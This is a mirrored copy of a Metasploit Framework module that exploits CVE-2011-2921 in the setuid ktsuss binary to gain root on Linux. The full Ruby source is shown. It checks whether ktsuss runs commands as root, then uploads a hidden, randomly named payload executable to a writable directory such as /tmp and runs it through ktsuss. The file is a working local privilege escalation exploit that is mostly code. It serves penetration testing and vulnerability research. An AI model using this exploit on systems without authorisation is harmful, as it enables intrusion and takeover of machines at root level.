CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'ktsuss suid Privilege Escalation',

21
        'Description' => %q{

22
          This module attempts to gain root privileges by exploiting

23
          a vulnerability in ktsuss versions 1.4 and prior.

24


25
          The ktsuss executable is setuid root and does not drop

26
          privileges prior to executing user specified commands,

27
          resulting in command execution with root privileges.

28


29
          This module has been tested successfully on:

30


31
          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and

32
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).

33
        },

34
        'License' => MSF_LICENSE,

35
        'Author' => [

36
          'John Lightsey', # Discovery and exploit

37
          'bcoles'         # Metasploit

38
        ],

39
        'DisclosureDate' => '2011-08-13',

40
        'References' => [

41
          ['CVE', '2011-2921'],

42
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],

43
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],

44
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']

45
        ],

46
        'Platform' => ['linux'],

47
        'Arch' => [

48
          ARCH_X86,

49
          ARCH_X64,

50
          ARCH_ARMLE,

51
          ARCH_AARCH64,

52
          ARCH_PPC,

53
          ARCH_MIPSLE,

54
          ARCH_MIPSBE

55
        ],

56
        'SessionTypes' => ['shell', 'meterpreter'],

57
        'Targets' => [['Auto', {}]],

58
        'DefaultOptions' => {

59
          'AppendExit' => true,

60
          'PrependSetresuid' => true,

61
          'PrependSetresgid' => true,

62
          'PrependSetreuid' => true,

63
          'PrependSetuid' => true,

64
          'PrependFork' => true

65
        },

66
        'Notes' => {

67
          'Reliability' => [ REPEATABLE_SESSION ],

68
          'Stability' => [ CRASH_SAFE ]

69
        },

70
        'DefaultTarget' => 0

71
      )

72
    )

73
    register_options [

74
      OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])

75
    ]

76
    register_advanced_options [

77
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])

78
    ]

79
  end

80


81
  def ktsuss_path

82
    datastore['KTSUSS_PATH']

83
  end

84


85
  def base_dir

86
    datastore['WritableDir'].to_s

87
  end

88


89
  def upload(path, data)

90
    print_status "Writing '#{path}' (#{data.size} bytes) ..."

91
    rm_f path

92
    write_file path, data

93
    register_file_for_cleanup path

94
  end

95


96
  def upload_and_chmodx(path, data)

97
    upload path, data

98
    chmod path

99
  end

100


101
  def check

102
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path

103
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

104


105
    vprint_good "#{ktsuss_path} is setuid"

106


107
    id = cmd_exec 'whoami'

108
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s

109
    vprint_status res

110


111
    unless res.include? 'uid=0'

112
      return CheckCode::Safe

113
    end

114


115
    CheckCode::Vulnerable

116
  end

117


118
  def exploit

119
    if !datastore['ForceExploit'] && is_root?

120
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

121
    end

122


123
    unless writable? base_dir

124
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

125
    end

126


127
    payload_name = ".#{rand_text_alphanumeric 10..15}"

128
    payload_path = "#{base_dir}/#{payload_name}"

129
    upload_and_chmodx payload_path, generate_payload_exe

130


131
    print_status 'Executing payload ...'

132
    id = cmd_exec 'whoami'

133
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "

134
    vprint_line res

135
  end

136
end

137


138